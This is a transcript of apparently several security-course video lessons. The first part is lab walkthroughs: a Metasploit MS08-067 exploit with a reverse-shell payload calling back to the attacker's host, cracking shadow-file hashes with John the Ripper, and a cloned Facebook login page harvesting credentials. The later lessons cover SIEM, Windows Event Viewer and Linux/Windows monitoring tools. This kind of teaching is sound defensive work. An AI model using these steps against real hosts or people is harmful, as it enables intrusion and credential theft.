to tell us what kind of vulnerabilities exist on hosts on the network, or even on a single host if that's what we choose to scan. Nmap is a widely used network scanner to map out what's on the network. Wireshark is a widely used packet sniffer that is available for free on various platforms. Capturing network traffic with a packet sniffer can reveal things that shouldn't be on the network, in terms of hosts or protocols that are in use, or even insecure mechanisms being used over the network. In this video we talked about Common Exploit Tools.
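As a rough idea of how a few of these tools are invoked, consider the following sketch; the interface, target range, wordlist, and capture file names are hypothetical, and the exact options vary by version.

# dsniff: listen for cleartext credentials on an interface
dsniff -i eth0

# nmap: map hosts and service versions on a subnet
nmap -sV 192.168.1.0/24

# aircrack-ng: attempt to recover a Wi-Fi key from a captured handshake using a wordlist
aircrack-ng -w wordlist.txt wpa-handshake.cap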
During this video, you will learn how to use Metasploit tools to further understand the tools attackers use.
Objectives
[Topic: Exploring the Metasploit Suite of Tools. The presenter is Dan Lachance.] In this video, I'll
demonstrate how to work with the Metasploit framework in Kali Linux. [The root@kali:/ command prompt
window is open. It displays the output of the following command: nmap -n -sV 192.168.1.242.] Metasploit is
essentially a tool that we can use for penetration testing so that we can perpetrate remote attacks over the
network against other hosts. And we do this by using specific exploits that are available within the framework
and payloads. Payloads are essentially chunks of code that we can run on a remote system. So the payloads are
designed to work together with an exploit. So currently I'm running an nmap scan on a host that I know is
running Windows XP. Now, the reality is, of course, you would have to scan the network to see if there was
anything that looked vulnerable in the first place before you knew exactly which exploit and payload to use
against that host. So what I'm looking for here is port 445. Now, if we take a look at the Windows XP
target [The screen switches to cmd.exe command prompt window.] and run netstat -an, we can see indeed that
port 445 is actually open, and it's in the listening state. This is a scary problem, we never want this for a
machine that's exposed, especially to the internet. So what now? [The screen switches back to root@kali:/
command prompt window.] Well, we're going to clear the screen, and we're going to type, msfconsole to get
into the Metasploit Framework command line console. This is going to make all of the exploits and payloads
that we need to pair together available for us. Allowing us also to set some variables, like the IP address of the
remote host, so that we can run the exploit against it. Now that we're in the msf interactive prompt, the first
thing we can do is type show exploits to get an idea of how many of these exploits are actually there. So you
need to have a sense of which exploit you want to use, and that can be done with some very basic searching or
through experience in using the Metasploit framework.
So we can see the list that has scrolled by of various exploits that are available, and especially related to
Windows and VNC and client buffer overflows and so on. At the same time, we can also type, show payloads
to see the payloads that are available that we would pair with those exploits. And remember that payloads are
essentially pieces of code that we actually would end up running on a remote system when we exploit it. So we
have a list here available as well. So what we're going to do in this case is, we're going to type use exploit/.
And in our example we want to take advantage of port 445, which is the SMB, or Server Message Block port
that we saw was available on that host. So we're going to use exploit/windows/smb. And with a bit of research,
we can figure out exactly which exploit we need to use, which I've already gone and done. So I'm going to go
ahead and enter it here, and I'll press Enter. [Dan executes the following command: use
exploit/windows/smb/ms08_067_netapi. The prompt changes to msf exploit(ms08_067_netapi).] And it puts
me in to that exploit, so I'm ready to work with it. So for that exploit, I'm going to set the remote host variable
RHOST to the IP of the target, which in this case is 192.168.1.242. Now, I know that because the nmap scan
revealed that it had port 445 open. Okay, so now that that's done, I'm going to set the appropriate payload to
pair with that exploit. So set payload, again, this requires a bit of research ahead of time, unless you're used to
using these all the time already. So I'm going to put in the path for that, I'm going to use reverse_tcp. [He
executes the following command: set payload windows/meterpreter/reverse_tcp.]
And now that I've already set my remote host variable RHOST, I'm going to have to set my local host or
LHOST variable, which is going to be the IP address of the machine where I'm running this. Where I want any
return traffic to come back to. So I'm going to say set LHOST 192.168.1.91. That is the IP address of this
Linux host. I'm going to set a port too, so set LPORT, let's say, 1234. And now I'm going to run the exploit by
typing in exploit. The thing to be careful of with this is to be patient. So depending on your network and the
type of exploit you're trying to run, it may take longer than you might expect before you get a response back.
So just be patient, we're going to go ahead and wait a minute and then see what happens. Okay, so it worked.
We can now see it detected that it was a Windows XP machine and it opened up a Meterpreter session. So this
is good news from the sense of being able to successfully exploit port 445 on that host. So now if I were to
type ipconfig, it's actually running on that remote machine. Also, if I were to type shell, it's going to give me a
remote Windows shell, even though I'm here in Linux running the Metasploit framework.
So from here, I can do pretty much whatever I please on that Windows host. [He executes the dir command.] I
can get files there, delete files, poke around, and so on. In this video, we took a look at how to work with the
Metasploit framework.
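Consolidated for reference, the msfconsole session demonstrated in this video comes down to the following sequence of commands; module paths are normally given in the singular exploit/ form.

msfconsole
use exploit/windows/smb/ms08_067_netapi
set RHOST 192.168.1.242
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.1.91
set LPORT 1234
exploit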
Learn how to use Kali Linux tools to further understand the tools attackers use.
Objectives
[Topic: Exploring the Kali Linux Suite of Tools. The presenter is Dan Lachance.] In this video, we'll take a
look at Kali Linux. [The Kali Linux Downloads page of the www.kali.org web site is open. Running along the
top of the page are six tabs, which are Blog, Downloads, Training, Documentation, Community, and About
Us. The Downloads tab is selected by default. The page also includes a Download Kali Linux Images section
that lists various Kali Linux images with their size and version.] Kali Linux is a free downloadable distribution
of Linux with hundreds of security tools built in. It stems from the older BackTrack distribution, which itself grew out of the earlier Auditor security-focused Linux distribution, although those projects have since been discontinued. Here on the kali.org
webpage, we have the option of downloading ISO images for Kali Linux, whether it's 64 or 32-bit. And you
can run it right from the ISO, even by burning it to a DVD. When you boot up you even have the option of
installing it on a local hard disk. With most versions of Kali Linux, you log in as user root, R-O-O-T, and the
password is T-O-O-R, in other words, root backwards. So, once we're into Kali Linux, we have a GUI
environment. [The Kali Linux GUI is open on screen. Running along the top is a menu bar with Applications
and Places drop-down menus. The taskbar is present on the left-hand side of the screen.] Although, when you
boot up, you do have numerous options to choose from. Here I've selected the default, which takes me into the
GUI mode. From the Applications menu up in the upper left, we can go through all the different categories of
tools, such as Information Gathering, or Reconnaissance Tools. [Dan clicks the Applications menu. A drop-
down list appears that has various options such as Information Gathering, Vulnerability Analysis, and so on.
He points to the Information Gathering option and a flyout menu appears that has various options such as
dmitry, nmap, sparta, and so on.]
So we can see, for instance over there, we've got options like nmap and even the graphical sparta tool, which
can use other things in the background like nmap to do discovery of devices on the network. We've got
Vulnerability Analysis where we've got tools available. Web Application Analysis, Database Assessment
Tools, even Password Attacks such as the John the Ripper tool. We've got Wireless Attacks so that we can
crack into WEP, WPA, or even WPA2 protected wi-fi networks. We've also got a number of Exploitation
Tools such as the Metasploit framework, and the social engineering toolkit or SE toolkit. In the Sniffing and
Spoofing section we've got the standard options like Wireshark for packet sniffing. We've also got interesting
tools like driftnet, which allow us to view images that others are viewing on the network, literally, as in
pictures. There are other Forensics tools available here. We've also got some Reporting Tools, and then we've
got the Usual Applications of course that are available in any Linux distribution. In the left hand bar we can
also start a Terminal shell [He clicks the Terminal icon from the toolbar to open the root@kali:~ terminal.] if
we want to do stuff at the command line. Now some of the tools available in Kali Linux are graphical based,
whereas others are entirely done at the command line. In this video we learned about Kali Linux.
In this video, you will learn how to crack passwords.
Objectives
[Topic: Password Cracking. The presenter is Dan Lachance.] In this video, I'll demonstrate how to crack
passwords. [The root@kali:~ command prompt is open.] Password cracking can be done using many different
techniques, from social engineering, where we trick someone that's unsuspecting into divulging their password.
Or we might use some kind of brute-forcing tool like John the Ripper, which we'll examine here, which can
take a list of possible passwords and apply it against an account until it gets a match. Or we might use some other kind of tool where we spoof an entire website, fooling people into going to this website to put in their credentials, which gives us an easy way to get passwords as well. We could even use tools that take the resultant hash of a password and, for example by comparing it against precomputed hashes, try to derive the originating password. So there are many ways to do it. Let's start here in Kali Linux by using the
command useradd to create a user called jdoe. [Dan executes the following command: useradd jdoe.] We'll
then use the passwd or password command to set a password for that account. [He executes the following
command: passwd jdoe. He is prompted to Enter new UNIX password.] This is the account that we're going to
try to brute force using the John the Ripper tool included in Kali Linux. [He is prompted to Retype new UNIX
password, which is then updated successfully.] Now if I cat the /etc/passwd file and grep it for jdoe, [He
executes the following command: cat /etc/passwd | grep jdoe.] then we're going to see our newly created user.
However, we don't see the password and that's because the password is in the shadow file. Let's bring up that
previous command but let's just change the file name from passwd to shadow. [He executes the following
command: cat /etc/shadow | grep jdoe.] Okay, now we can see user jdoe and then after that we see a colon
which is the delimiter for all the different items in this file, followed by this long password hash.
We're going to use the unshadow command to put the contents of these two files together for ease of trying to
crack the password. So I'm going to type unshadow /etc/passwd /etc/shadow and then we're going to give it an
output redirection symbol. I want this to be called password_files. Okay, now why don't we take a look here.
Let's use the vi command and go into /usr/share/john because we're going to use John the Ripper tool. I want to
take a look at the password list file that's supplied here. Of course, it could be modified, you could use
different languages, different types of terms like legal or medical terms. [He executes the following command:
vi /usr/share/john/password.lst.] So here, for instance, notice I've added the first entry here, a variation of Pa$$w0rd. That is actually what I set as the jdoe password. Now it's not always going to be as simple as brute
forcing with a list of passwords and cracking the password. Sometimes it works, other times it doesn't. But the
nice thing about using a tool like John the Ripper is that it automates the attempts. You don't have to try it
manually. Bear in mind, if you use some kind of a brute force tool like this, it could actually lock out the
account, if intruder detection has been enabled. You know, maybe for example after three incorrect login
attempts, one after another, the account's locked for a day.
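Written out in full, the unshadow step described a moment ago looks like the line below. The lockout settings that follow are just a sketch of the "three strikes, locked for a day" idea, assuming a distribution that uses pam_faillock with /etc/security/faillock.conf; Kali itself may be configured differently:

# combine account details and password hashes into one file for John the Ripper
unshadow /etc/passwd /etc/shadow > password_files

# hypothetical /etc/security/faillock.conf settings: lock after 3 failures, unlock after 86400 seconds (one day)
deny = 3
unlock_time = 86400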
That is possible. However, as we go through this password list file, we've got all kinds of words that are commonly used as passwords, like 123abc, so we could modify this. There are plenty of other word lists that you could go ahead and download as well. Just be careful, because you may see some of the more offensive items in this password file, but the reality is you're going to see those kinds of things out there. Okay, let's get out of here. So I'm going to type :q for quit to get out of the vi text editor. [The screen goes
back to the command prompt.] And now what we're going to do is actually go ahead and attempt to crack a
password. So I'm going to type in john, because that's the command to run the John the Ripper Password
cracking tool. --wordlist=/usr/share/john and we just looked at the file, it's called password.lst. So here we go,
password.lst, and then I'm going to give it our combination of our /etc password and shadow files which were
called password_files. I'm going to go ahead and press Enter [He executes the following command: john --
wordlist=/usr/share/john/password.lst password_files.] and we can see it's currently doing its work. So,
how many passwords you have in your list file, among other things, will determine how long it will take.
Now, we've set up this example so it would be very simple and quick and we can see immediately the
password for user jdoe. So it's done that and it's associated with user jdoe by looking at the hash in that file. So
once this is complete, then we're ready to go. I'm going to interrupt this with Ctrl+C because we've got what
we need. Now you can also use the john command with --show and ask it to show any passwords that it's
determined already. [He executes the john --show password_files command.]
So here it tells me that the password for jdoe is, well, the variation of the word password. Although in the file,
it's a hash of it, isn't it? It's not the actual password, but here it's displaying the actual password that we could
actually use to log in as that user. Now, that's one way of cracking passwords. Brute-forcing is not always effective, and it might also end up locking accounts. However, it can be useful in some cases. Now,
another way that we can work with this is by essentially mimicking common websites that people would
frequent and spoofing the whole website. Basically setting up our own fake web server like for Facebook,
which we'll do in this example. Here in Kali Linux, I'm going to type setoolkit which stands for social
engineering toolkit. I'm going to go ahead and press Enter and now notice I'm in a different interactive prompt
that has SET for Social Engineering Toolkit. [The screen prompts to select from the listed menu options such
as: 1) Social-Engineering Attacks, 2) Fast-Track Penetration Testing, and so on.] So what I want to do then is
I want to start the Social Engineering Toolkit, so I'm going to go ahead and press number 1 for Social
Engineering attacks. [The screen again prompts to select from the listed menu options such as 1) Spear-
Phishing Attack Vectors, 2) Website Attack Vectors, and so on.] What I'm interested in doing then is website attack vectors, so number 2. [The screen now displays another set of menu options such as 1) Java Applet Attack Method, 2) Metasploit Browser Exploit Method, 3) Credential Harvester Attack Method, and so
on.] The next thing I want to do is credential harvesting, so I'll press number 3. [The screen again displays
menu options such as 1) Web Templates, 2) Site Cloner, and so on.] I want to clone a website so I'll press
number 2. And it wants me to pop in the IP address for my Kali Linux machine, not the website. So here I'm
going to pop in 192.168.1.91. Then it asks me to put in the URL for the site that I want to clone. I'm going to put in www.facebook.com. Looks like I put that in incorrectly, so I'm going to have to try that again.
Let's try that again. Site cloner, put in my local IP address, it helps when you type things in correctly. So let's
try this again, www.facebook.com. Now what it's doing is cloning the website so that it will actually be
running on that machine, it looks like the real deal. So you can see here in a web browser, [The screen
switches to a web browser. The http://192.168.1.91/ address is present in the address bar of the browser. It
displays the Facebook login page, which includes fields for username and password, and a Log In button.] if I
actually connect to my Kali Linux installation, it actually looks like the real Facebook site. So of course, what
this would require is to redirect users to this IP address, which could be done by compromising their system
and editing the hosts file, or maybe making an entry on a DNS server that you've compromised.
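As a sketch of that hosts file approach, a single added line on a compromised client would quietly send its Facebook traffic to the attacker's machine; the IP address here is the Kali Linux address used in this demo:

# hypothetical entry appended to /etc/hosts (on Windows, C:\Windows\System32\drivers\etc\hosts)
192.168.1.91    www.facebook.com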
So here, I've put in the name and the password, and I'll go ahead and click Log In. Interestingly, the user actually gets redirected to
the real page, [The Facebook login page opens which has the following web address:
https://www.facebook.com/login.php.] So what's interesting here is that it's kind of stealthy; the user doesn't even know what's happening. Let's go back and check Kali Linux. So back here in Kali Linux, I'm going to go ahead and
type 99 to return back to the main menu. And then of course, I'm going to finally exit this entire tool. The next
thing to do to review the results is to go into the /var/www/html folder. [The screen switches to Kali
terminal.] And if you do an ls, you'll see a harvester file there. If you cat that file to view its contents and
perhaps pipe it to more, in case it's really long, [He executes the following command: cat harvester_2016-09-
16\ 11\:07\:02.664969.txt | more.] then you're going to start seeing some interesting information. Here I can
see [email protected], and I can see the entered password. Now remember that user doesn't really suspect that
that was a fake login page. They were redirected to the real thing and successfully got into Facebook. So, here
we have an easy way essentially of tricking people into divulging passwords. So, it's important, then, to make
sure that people's machines can't be compromised, so that hosts file entries can't redirect them to fraudulent sites, and
that DNS servers are hardened so that they can't be compromised. In this video, we learned how to crack
passwords.
Table of Contents
After completing this video, you will be able to recognize the importance of continuous monitoring of various
systems.
Objectives
[Topic: Reasons for Monitoring. The presenter is Dan Lachance.] In this video, I'll talk about reasons for
monitoring. In order to effectively manage and maintain a network environment and all of the hosts and applications it consists of, we need to be constantly monitoring all aspects of the network to ensure that everything is performing well, and also to ensure that our security controls are effective in protecting assets.
So with monitoring, we can identify changes that might have occurred that can change the security impact of a
system. So for example, if we've got remote desktop being enabled on a server, we might want a notification to
that effect. Because maybe we don't use remote desktop in our environment. Instead, we use remote
management tools from a client to get to the Windows server. So, monitoring can also bring to light poorly designed controls that might even have been effective at one point in time, but are ineffective currently. So
monitoring provides ongoing oversight as to what's happening on the network and to its hosts. And to the
applications used by and running on those hosts. At the auditing level, this only works correctly if everybody is
using a separate user account when they perform network activities. Whether they're an end user or an IT
technician creating user accounts.
Transactions can also be inspected in the case of database applications, so that we can track exactly what's
happening, with a correct date and time source, and who, or which device or application, started the action. Monitoring can also be tweaked to focus on cyber defense, where we can
monitor our network infrastructure, which includes devices like routers, switches, wireless access points, VPN
appliances. Now there are many ways that these can be monitored. The old standard that's been used for
decades is SNMP, the Simple Network Management Protocol, where, from a central management station, we
can reach out over the network to these SNMP compliant devices. And basically, poke and prod any statistics
that they might make available through SNMP. In some cases, we might even be able to reconfigure those
devices through SNMP.
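As a minimal sketch of that kind of polling, assuming the net-snmp command line tools are installed, a read-only community string of public, and a made-up router address:

# walk the system group of an SNMP-enabled device to pull basic identity and uptime statistics
snmpwalk -v2c -c public 192.168.1.1 system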
Now of course, monitoring can also apply to all of our user devices and to servers as well. We might even install an agent on those operating systems to report back detailed information periodically.
Security information and event management, or SIEM, is a standard in the IT industry.
It's a monitoring standard that's used to detect anomalies, then to prioritize incidents, and then to manage those incidents. Now, just as is the case with a raw intrusion detection or prevention system, often, SIEM
systems need to be tweaked for a specific environment. Due to legal or regulatory reasons, we might not have a
choice but to monitor our network or specific applications. Or to set triggers for certain types of transactions
that occur, such as high-volume financial transactions. In the cloud, there is something known as CMaaS,
which stands for continuous monitoring as a service. So instead of having an on-premises continuous
monitoring solution running on our equipment, it can be run through the cloud. Monitoring is also beneficial in
the sense that it can show us areas where there are inefficiencies and where we can optimize performance, either of the network as a whole, or of individual hosts or processes within applications. We can also ensure that the network and systems are used properly and only by authorized users. In this video, we discussed the reasons
for monitoring.
During this video, you will learn how to distinguish the difference between common monitoring tools.
Objectives
[Topic: Common Monitoring Tools. The presenter is Dan Lachance.] In this video, I'll talk about Common
Monitoring Tools. The many monitoring tools available for IT networks and hosts share a lot of common features. Some monitoring tools are real-time, where they are constantly watching for certain types of changes, and they can alert or even do something about it immediately. In some cases, this type of real-time monitoring solution requires an agent to be installed where that's possible, such as on an operating system.
Monitoring tools can also do a historic analysis of data to determine, for example, if there are anomalies or
times that are missing from log files. All monitoring tools should offer configurable
notifications, whether we are notifying technicians through SMS text messages, through email and so on. In
some cases, monitoring tools will also have the built-in capability of auto remediation. Where, when
something is detected, it automatically gets fixed. So, for example, if our monitoring system detects that the
Windows firewall is not enabled on a laptop, it can automatically turn it on for additional security. But in order
for that to work, there would need to be some kind of software agent running on the Windows machine. And
that's exactly what happens when we use things like network access protection in Windows environments.
There is a client-side agent or service running that allows that to be possible. Log files can be monitored
whether we're looking at the Windows environment or UNIX and Linux. In Windows, there are numerous Event Viewer logs: for the operating system, for products like PowerShell, Internet Explorer, DNS, TCP, Group Policy, and the list goes on and on. Now the reality is, we probably don't have time to pore over all of these logs on each and every Windows host.
So it can be configured such that when we view a log, it is filtered. We can even build a custom view log
where we only display things that are of interest, such as warnings or critical errors and so on. The same type
of thing is possible with UNIX and Linux. Now, in UNIX and Linux, log files for most software exist
under /var/log. Here on a Windows Server 2012 machine, I've gone into the Windows Event Viewer and I'm
looking at the standard Windows System log. [The Event Viewer window is open. Running along the top is a
menu bar with menus like File and Action. Below that is a toolbar with various icons like back and forward
arrows. The rest of the screen is divided into four parts. The first part lists the folders of the Event viewer such
as Custom Views and Windows Logs. The Windows logs folder is expanded and it has various options such as
Application, System, and so on. The System option is selected by default. The second part displays the contents
of the option selected in the first part. It lists the events in the system in a tabular format. The table headers
are Level, Date and Time, Source, Event ID, and Task Category. The third part displays the details of the
event selected in the second part. The fourth part is titled Action and it lists the available actions for the
system and the selected event.] Well, we can see there are log entries that have a level of error, information, warning
and so on. Now one of the things that we could do here is we could sort, for example, by Level. [Dan clicks
the Level table header in the second part.] So, this way we have the ability to essentially group together all of
the errors, all of the informational messages, and all the warnings. Although they won't be in chronological
order any longer. But another option is to build a Custom View. Over on the left, if I were to expand Custom
Views, I could then right-click and choose Create Custom View. [from the shortcut menu. The Create Custom
View dialog box opens. It contains two tabs, Filter and XML. The Filter tab is preselected, which displays
various filters to select from.] Now, here what I might do is build a Custom View that shows me only Error,
Critical, and Warning messages. But I can get even more detailed with my filtering because I can do it by
specific logs. So, here for instance, under Windows Logs, I'll just choose the System log. And perhaps down
under Applications and Services Logs, I'll choose Microsoft > Windows, and I'm just going to keep going
down here. And maybe for this example I'll choose GroupPolicy. So now I'm asking for Critical, Warning and
Error log entries from those specific logs. I can also specify specific event ID numbers, which indicate a
certain type of event has occurred, or I can use keywords, or do it by user or computer. But for now, I'm just
going to click OK, [The Save Filter to Custom View dialog box opens. It includes text fields for Name,
Description, and buttons such as Ok and Cancel.] and I'm going to call this Nothing But Trouble. And then I'll
click OK. So we now have a Nothing But Trouble custom log view.
And we can see over on the right that it's been filtered; the only things we're really seeing are Errors, Warnings,
and so on. To take that a step further, I could even right-click onto my custom view listed in the left-hand
navigator. [He right-clicks the Nothing But Trouble custom view and a shortcut menu appears. It lists various
options such as Open Saved Log, Create Custom View, Attach Task To This Custom View, and so on.] And
what I can do is attach a task to that view. [He selects the Attach Task To This Custom View option and the
Create Basic Task Wizard opens.] Essentially, as I go through this wizard, I could then determine exactly what
it is that I want to do. Maybe start a program, send an e-mail message or display a message. So basically, we
can trigger something to happen when we get a new log entry in this specific custom view. [He cancels out of
the wizard.] Now at the enterprise, large scale level, you'd probably be using some kind of a SIEM solution,
which gives you many more capabilities. But in some cases, some of these options built into the operating
system can actually be very useful. As we mentioned, we might use a SIEM, a security information and event
management solution, to monitor activity on the network and devices and applications, even in real-time. So
we can monitor data, looking for threats, and SIEM solutions even have the ability to contain and manage
incidents as they occur. Of course, we've also got the standard, raw tools. And the reason I say raw is because, you know, a SIEM solution could include intrusion detection and prevention, but outside of a SIEM solution, we have these raw, individual capabilities. That includes intrusion
detection systems or IDSs, which can be host-based or network-based. Intrusion detection systems can detect
anomalies and report on them or send notifications, but they don't do anything about it. Intrusion prevention systems, whether host or network-based, not only detect anomalies, send alerts or notifications, or write that information to logs, but can also be configured to take action to prevent the intrusion from completing. Supervisory control and data acquisition is often referred to as SCADA. This is a
monitoring tool set that is used in industrial environments. So, similar to SIEM, it has the ability to monitor all
aspects of the network or industrial equipment and report on it in real time. In this video, we talked
about Common Monitoring Tools.
In this video, you will learn how to monitor the Linux operating system.
Objectives
[Topic: Linux OS Monitoring Tools. The presenter is Dan Lachance.] Linux and Unix operating systems
certainly allow us to do things from the command line but also in some cases with GUI interfaces. In this video
we'll explore Linux command line OS monitoring tools. [The root@kali:~ command prompt is open.] There
are plenty of tools built into Linux that we can use to monitor various aspects of the system. The first one we'll
take a look at here is top. Now remember that Linux commands are case sensitive, so the fact that I'm typing this in lowercase letters actually matters. Now when I type in top and press Enter, I get a list of running processes where the top consumers of things like CPU utilization are listed at the top of the list, and the ones putting the least load on CPU utilization are listed further down the list.
So notably we can see the PID in the leftmost column, the process ID, followed by the USER that spawned
that process. Now in some cases the system itself will spawn processes. Further over to the right, we can see
the percent of CPU utilization and percent memory being consumed by a given running process along with the
actual command itself, listed in the rightmost column. There are also some statistics up at the top, like how
long the system has been up and running, how many users are connected, the load averages over the last
periods of time. It tells me that there are 207 tasks running in total and so on. But we can interact with this
while we're working with it. For example, if I press the letter d, I get asked to change the delay for the screen output of this command from three seconds to something else. Maybe I'll type 0.5 and press Enter. And we
can immediately see that our update is much more frequent. I'm going to press d and we're going to go back to
every three seconds. So I'll type in 3 and press Enter.
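As a side note, that same refresh interval can be set when launching top in the first place; a minimal sketch:

# start top with a half-second refresh interval instead of the default three seconds
top -d 0.5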
But there are other great things we can do here in top as well. For instance, maybe we don't want to see all of
these columns of information. We're only interested in a few. So how do we filter them out? If I press the letter
f, and of course I'm not holding Shift, so it's not an uppercase F, it's just a regular lowercase f, it takes me into
this screen where I can manage fields. So f for fields. In the left-hand column we can see whether or not there's
an asterisk next to a field name. And if there is an asterisk, it's currently being displayed. So basically, you use the arrow keys to move up and down, and you can toggle the display of a field on and off by using your
space bar. So if I hit the space bar for a bunch of these fields I don't want to see, then the asterisk is removed,
which means that they will not appear in the screen output. And maybe I want to sort by something other than
CPU utilization, maybe by %MEM for memory. So I'll go down with my arrow keys and highlight that one,
and then what I can do is press the letter s to sort by that. Now you might say, nothing changed on the screen,
when in fact it did, if you look in the upper right. It says the current sort field is %MEM. You see, if I highlight
%CPU and press s, now up in the upper right it says current field that is being sorted is %CPU. So I'm going to
go back and sort it by memory.
Now that I'm happy with this I'll press the letter q for quit. And we're back in the top command, where we still
have a live screen updating every three seconds. However, we're missing some columns, and now it's
sorted by percent memory instead of percent CPU. So I'm going to go ahead and press q to quit out of here. In
Unix and Linux we have manual or man pages which are help pages for Linux commands. So maybe I want to
know more about how to use the top command, maybe in batch mode where I can start writing things to files
instead of having to babysit it in real time while I watch it on the screen. So for instance, if I were to type man
space top, it opens up the man page for the top command and as I go further down, I'll just press on the Enter
key here. As I go further down through this man page, I can see all of the different ways that this command is
designed to work. And eventually, as I go further down, I'll see the various command line switches such as -b
to run in batch mode. Now the idea here is that batch mode can send output to a file, for instance, so we can examine our monitoring output later instead of having to view it in real time. So I'm going to go ahead and press q to get out of that man page.
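As a quick sketch of that batch mode, assuming we want a handful of snapshots written to a file for later review rather than a live screen:

# take 5 snapshots, 10 seconds apart, in batch mode, and save the output to a file
top -b -n 5 -d 10 > top_snapshot.txt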
Now some other interesting commands in Linux, and there are plenty of them, include things like the ps command to list processes. When I type ps with no parameters, it only shows me the
running processes in this current session. So we've got our bash Linux shell, which is allowing us to type
things in the first place.
And of course at the time it was executing, ps was executing, so it shows up as well. We can also see the
process ID assigned to each of these processes in the leftmost column. However, things get interesting if I start
using command line switches like aux to view all processes, including user processes; the x is for processes that aren't tied to a terminal, meaning things that are started up by the system. [Dan executes the
following command: ps aux.] So if I do that I get a very big output. Now of course, I use the up arrow key to
bring that back. I could pipe that using my vertical pipe symbol, which I get by shifting the backslash key. I
can pipe that to more to stop after the first screen full. [He executes the following command: ps aux |
more.] This way I can see the column headings at the top. So from the left we've got the user column followed
by the process identifier, %CPU, %MEM, and so on. In Unix and Linux, we could also pipe the result of a
command like ps aux to grep where we might filter for something specific. Here, I want to get information
about the running process called sshd, the ssh daemon which allows remote command line administration. [He
executes the following command: ps aux | grep sshd.] And in this case I can see that I've got a couple of
entries, ignore the last one which of course is us grepping for sshd in the first place. But I do see the first listing
here where it's referencing my ssh daemon which is running on this host. So if we want to, we can filter those
types of things out. Also in Linux, other interesting things we can do, for instance, at the disk level, is we
might use df or disk free. [He executes the df command. The output appears in a tabular format with the
following table headers: Filesystem, 1K-blocks, Used, Available, Use%, and Mounted on.] Now what I might
want to do, instead of doing this in 1k blocks is use df -h for human readable. [The output now contains a Size
column instead of the 1K-blocks column.]
Then instead, it's a little bit more readable, where I'm reading megabytes, or technically mebibytes. And the difference really is that a megabyte is 1000 kilobytes, where a mebibyte, and yes, that's mebibyte with an i, is actually 1024 kibibytes, or 1,048,576 bytes. So there is a little bit of a difference in how some Linux distributions will display things. And technically, a mebibyte is not exactly the same thing as a megabyte. Other things I might
be interested in using for monitoring here built into most Unix and Linux distros is the tcpdump command.
This one is really cool because it's kind of like having a built in command line packet sniffer and it's been there
for decades. For instance, if I type tcpdump -i for interface, now that's a lower case i, remember case
sensitivity is important. I'll give it the name of my interface which I know is eth0. If you're not sure, you can
type ifconfig on your Unix or Linux host. If I just press Enter, it starts capturing everything and it's scrolling by very
quickly. So I'm going to interrupt that by pressing Ctrl+C and I'll type clear to clear my screen. I'll use the up
arrow to bring up tcpdump command. What I want to do here is capture traffic destined for a specific host. So
I'll put in the IP address here, where it's going to port 22.
So dst for destination followed by a space and the destination IP. Then after that we've got a space, the word
and, a space, the word port, and a space and 22. So I only want to capture stuff going to that IP address,
specifically to port 22. And I can also pass a -A to view everything in ASCII form instead of hex. [He executes
the following command: tcpdump -i eth0 dst 192.168.1.91 and port 22 -A.] So now we can see ssh traffic that
applies to that specific type of connection that we asked for. I'll press Ctrl+C to interrupt that. The last thing we'll
mention about tcpdump is you may want to write that stuff to a file. So I'll just bring up our previous
command, and I'll add another switch after a space. What I'm gonna add is a -w, which means write, and I'm
going to put that in a file called, let's see, capture1.cap. [He executes the following command: tcpdump -i eth0
dst 192.168.1.91 and port 22 -A -w capture1.cap.] Okay, so now I can see tcpdump is listening, normally we
would see in this case ssh traffic, we're not seeing it because instead it's being redirected to our .cap file. This
can be useful because you could let this run for a period of time, you can even schedule it as a cron job in Unix
or Linux, and then review what's been captured at some point in the future.
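A minimal sketch of scheduling that kind of capture from cron; the schedule, the five-minute timeout, and the file name are assumptions for illustration, and cron may need the full path to tcpdump on your distribution:

# hypothetical crontab entry: every day at 2 a.m., capture five minutes of traffic to port 22
# note that % must be escaped as \% inside a crontab
0 2 * * * timeout 300 tcpdump -i eth0 port 22 -w /root/ssh_$(date +\%F).cap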
We're going to go ahead and press Ctrl+C to stop the capture; it tells me a few packets were captured. Finally, I can use tcpdump -
r to read in that file capture1.cap. [He executes the following command: tcpdump -r capture1.cap.] And there's
the data that was captured. In this video we talked about Linux OS monitoring tools.
In this video, you will learn how to monitor the Windows OS.
Objectives
[Topic: Windows OS Monitoring Tools. The presenter is Dan Lachance.] In this video, I'll demonstrate how to
work with Windows OS monitoring tools. Much like Unix and Linux operating systems, the Windows
operating systems, both client and server-based, contain a number of great built-in monitoring tools. Here in
Server 2012 R2, let's start by going to our Start menu and typing in perf, P-E-R-F, so that we can start up the
Windows Performance Monitor tool. The Performance Monitor tool has been built into the OS for quite a long
time, and it's still as useful as it was from day one. [The Performance Monitor tool window opens. Running
along the top is a menu bar with various menus such as File, Action, and so on. Below that is a toolbar with various icons such as back and forward arrows. The rest of the window is divided into two parts. The first part
is the navigation pane that has a root folder named Performance. The root folder is selected by default. Below
that are three expandable folders, namely Monitoring Tools, Data Collector Sets, and Reports. The
Monitoring Tools folder is expanded and it lists the Performance Monitor option. The second part displays the
contents of the option selected in the first part. The second part is divided into two sections, Overview of
Performance Monitor and System Summary.] So I'm going to click on the Performance Monitor in the left-
hand navigator, [The second part of the window is now divided into two sections. The first section has a
toolbar at the top with various icons such as plus, pause, and so on. It also displays a real-time graph of
percent Processor Time. The second section displays a table with following table headers: Show, Color, Scale,
Counter, Instance, Parent, Object, and Computer. The table lists the processes for which the graph appears in
the first section.] where by default, we've got a real-time graph that shows us the percent processor time in
total for all processor cores. Now I could click the green plus sign at the top of this tool, [Dan clicks the plus
icon from the toolbar. The Add Counters dialog box opens. It is divided into two sections that are Available
counters and Added counters.] where I can add additional performance counter metrics that I want to monitor.
They're all categorized here alphabetically. And this list is coming from the local computer, although I could
browse the network for other remote computers and monitor them remotely. Now, what's installed on the local server will determine which categories we have here; some are here no matter what. For instance, if we're working with IPv4, well, you're always going to have that here. But whether you've installed other server roles like DNS or DHCP or SQL Server, for instance, will determine the additional counters that you might actually see in this list. So I'm going to scroll down here to the P's, where
what I want to look for is Physical Disk.
And I'll expand that category and you can see, when you do that, you see the individual performance counter
metrics listed underneath. So I think what I'll do here is just look at the average disk queue length, which is an
indication of how many requests for disk I/O are queued up because the disk subsystem is already too busy.
Now, you need a baseline of normal activity before you can hit the panic button. Whatever value you've got in, for instance, the average disk queue length will vary from one environment to another. Naturally,
in a busy disk I/O environment on a file server, you can expect higher values in the average disk queue length
than on a server that is not a file server, maybe it's just a DHCP server. So I'm going to choose that for all disk
instances, but notice I could choose a specific disk instance. So I'll choose All instances, I'll click Add, which
